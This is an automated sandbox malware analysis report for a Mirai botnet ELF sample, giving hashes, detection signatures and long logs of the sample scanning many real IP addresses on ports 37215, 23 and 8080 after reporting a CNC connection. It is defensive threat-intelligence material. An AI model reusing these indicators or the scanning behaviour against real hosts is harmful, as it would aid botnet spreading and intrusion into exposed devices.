Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
7Ueun89KE3.elf

Overview

General Information

Sample Name:7Ueun89KE3.elf
Original Sample Name:151f3140977754a9befc0fab17a0cdcb.elf
Analysis ID:1346746
MD5:151f3140977754a9befc0fab17a0cdcb
SHA1:f013eef283e3bd33d57d0464db9bfd6559887e8b
SHA256:7d127378f0b4a5a2c3304d74493987da57d1ca7e289c63f4f7fb7c4808d8c3a3
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:68
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
ELF contains segments with high entropy indicating compressed/encrypted content
HTTP GET or POST without a user agent

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1346746
Start date and time:2023-11-23 05:14:07 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:7Ueun89KE3.elf
renamed because original name is a hash value
Original Sample Name:151f3140977754a9befc0fab17a0cdcb.elf
Detection:MAL
Classification:mal68.troj.evad.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/7Ueun89KE3.elf
PID:5419
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Connected To CNC
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 7Ueun89KE3.elfReversingLabs: Detection: 45%
    Source: 7Ueun89KE3.elfVirustotal: Detection: 29%Perma Link

    Networking

    barindex
    Source: global trafficTCP traffic: 156.224.12.71 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 156.247.25.138 ports 1,2,3,5,7,37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55738
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60386 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60386
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35242 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 35242
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33148 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45022 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58864 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58628 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58628
    Source: unknownNetwork traffic detected: HTTP traffic on port 50806 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55344 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46764
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46780
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46764
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46816
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46878
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 46894
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47060
    Source: unknownNetwork traffic detected: HTTP traffic on port 40802 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47074
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56480 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56480 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 56480
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47120
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47588
    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 47610
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51972 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 51972 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 51972
    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 41830 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 41830
    Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 53860 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53860
    Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52680 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 52680 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40548 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52302
    Source: unknownNetwork traffic detected: HTTP traffic on port 52680 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52328
    Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 34678 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 46712 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52352
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52400
    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52454
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33876
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52508
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33892
    Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33908
    Source: unknownNetwork traffic detected: HTTP traffic on port 33096 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38024 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 46712 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52536
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33932
    Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49604 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34108
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52734
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34110
    Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
    Source: global trafficTCP traffic: 192.168.2.13:40280 -> 74.50.84.203:45
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.121.211.145:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.172.37.157:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.99.68.19:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.123.80.145:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.166.51.15:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.249.58.104:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.134.204.33:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.103.199.52:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.80.192.155:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.154.63.250:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.38.129.117:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.88.16.59:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.15.231.45:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.117.233.218:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.195.119.199:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.193.10.55:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.79.192.50:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.207.202.240:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.197.3.84:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.232.225.235:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.224.12.71:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.204.225.82:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.15.236.2:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.203.174.213:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.187.124.142:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.165.2.33:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.209.75.22:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.109.92.169:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.2.122.90:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.134.79.11:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.92.95.213:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.151.29.152:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.208.132.161:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.96.81.2:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.213.39.70:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.176.132.116:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.166.153.43:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.56.16.5:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.78.80.52:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.71.85.143:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.127.103.188:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.15.56.22:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.18.83.31:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.94.158.108:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.133.29.47:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.138.115.132:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.160.222.165:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.123.112.158:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.24.144.199:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.2.168.117:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.140.30.9:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.187.49.42:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.210.55.224:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.230.150.51:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.175.184.223:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.250.204.254:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.25.150.137:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.147.159.113:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.69.27.33:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.77.136.4:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.199.76.7:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.59.35.246:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.248.142.148:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.193.237.108:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.187.113.108:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.244.237.36:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.24.201.28:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.71.32.157:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.246.79.25:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.113.47.60:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.2.66.16:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.134.104.238:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.69.70.180:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.151.214.94:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.246.229.20:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.21.108.155:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.101.184.158:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.37.11.185:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.58.65.67:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.46.79.180:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.201.87.12:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.247.25.138:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.184.122.222:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.179.88.99:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.135.96.104:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.139.41.211:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.190.170.118:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.77.71.30:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.119.166.11:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.55.246.208:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.151.76.188:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.136.176.60:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.229.20.166:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.201.8.90:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.246.33.198:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.56.238.118:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.145.225.130:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.193.26.184:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.189.173.53:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.69.140.35:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.88.219.88:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.159.61.225:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.9.190.94:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.199.183.62:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.102.11.247:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.35.86.216:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.98.251.144:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.62.46.166:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.98.139.150:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.129.10.187:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.172.140.165:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.175.86.38:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.131.25.98:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.189.91.58:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.131.217.146:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.231.90.192:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.195.214.250:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.64.111.137:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.185.162.173:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.43.250.54:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.177.107.227:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.139.106.208:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.210.142.205:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.163.32.133:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.25.29.244:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.201.144.141:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.110.252.230:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.38.131.30:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.187.103.230:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.38.44.46:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.200.172.55:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.81.14.86:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.92.212.239:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.184.29.179:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.122.34.66:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.153.2.29:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.183.137.1:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.125.63.206:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.247.209.137:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.202.118.2:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.15.61.67:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.92.155.84:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.169.68.249:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.185.54.11:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.222.22.253:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.122.255.3:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.222.100.126:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.190.80.129:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.138.37.96:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.57.146.226:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.35.125.29:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.148.33.245:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.224.167.48:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.192.195.90:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.17.175.26:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 197.9.82.234:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.115.47.238:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.226.147.158:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 41.6.237.102:37215
    Source: global trafficTCP traffic: 192.168.2.13:54970 -> 156.161.160.151:37215
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.14.64.5:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.221.211.5:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.111.138.6:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.149.116.150:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.62.240.162:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.64.243.49:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.71.79.34:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.193.52.61:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.167.205.53:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.212.115.84:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.169.49.250:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.246.38.239:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.126.3.71:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.66.226.20:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.210.133.9:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.21.101.123:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.171.238.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.35.169.173:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.161.27.192:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.23.111.244:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.207.111.61:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.244.121.7:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.141.154.150:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.59.209.128:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.31.121.175:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.30.177.152:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.117.135.210:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.92.194.130:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.230.153.44:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.219.35.39:8080
